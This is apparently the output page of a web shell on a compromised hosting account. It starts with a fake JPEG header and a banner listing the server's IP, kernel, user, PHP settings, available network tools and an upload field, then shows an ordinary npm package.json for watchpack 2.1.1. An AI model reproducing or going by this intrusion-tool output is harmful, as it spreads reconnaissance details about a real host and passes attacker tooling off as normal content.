ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.72 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/watchpack/ |
Upload File : |
{ "_from": "watchpack@2.1.1", "_id": "watchpack@2.1.1", "_inBundle": false, "_integrity": "sha512-Oo7LXCmc1eE1AjyuSBmtC3+Wy4HcV8PxWh2kP6fOl8yTlNS7r0K9l1ao2lrrUza7V39Y3D/BbJgY8VeSlc5JKw==", "_location": "/watchpack", "_phantomChildren": {}, "_requested": { "type": "version", "registry": true, "raw": "watchpack@2.1.1", "name": "watchpack", "escapedName": "watchpack", "rawSpec": "2.1.1", "saveSpec": null, "fetchSpec": "2.1.1" }, "_requiredBy": [ "/next" ], "_resolved": "https://registry.npmjs.org/watchpack/-/watchpack-2.1.1.tgz", "_shasum": "e99630550fca07df9f90a06056987baa40a689c7", "_spec": "watchpack@2.1.1", "_where": "/home/taxhyuvu/nodevenv/dp_taxhelplines/10/lib/node_modules/next", "author": { "name": "Tobias Koppers @sokra" }, "bugs": { "url": "https://github.com/webpack/watchpack/issues" }, "bundleDependencies": false, "dependencies": { "glob-to-regexp": "^0.4.1", "graceful-fs": "^4.1.2" }, "deprecated": false, "description": "Wrapper library for directory and file watching.", "devDependencies": { "coveralls": "^3.0.0", "eslint": "^5.11.1", "eslint-config-prettier": "^4.3.0", "eslint-plugin-prettier": "^3.1.0", "istanbul": "^0.4.3", "mocha": "^5.0.1", "prettier": "^1.11.0", "rimraf": "^2.6.2", "should": "^8.3.1", "write-file-atomic": "^3.0.1" }, "directories": { "test": "test" }, "engines": { "node": ">=10.13.0" }, "files": [ "lib/" ], "homepage": "https://github.com/webpack/watchpack", "license": "MIT", "main": "./lib/watchpack.js", "name": "watchpack", "repository": { "type": "git", "url": "git+https://github.com/webpack/watchpack.git" }, "scripts": { "cover": "istanbul cover node_modules/mocha/bin/_mocha", "lint": "eslint lib", "precover": "yarn lint", "pretest": "yarn lint", "pretty-files": "prettier \"lib/**.*\" \"test/**/*.js\" --write", "test": "mocha" }, "version": "2.1.1" }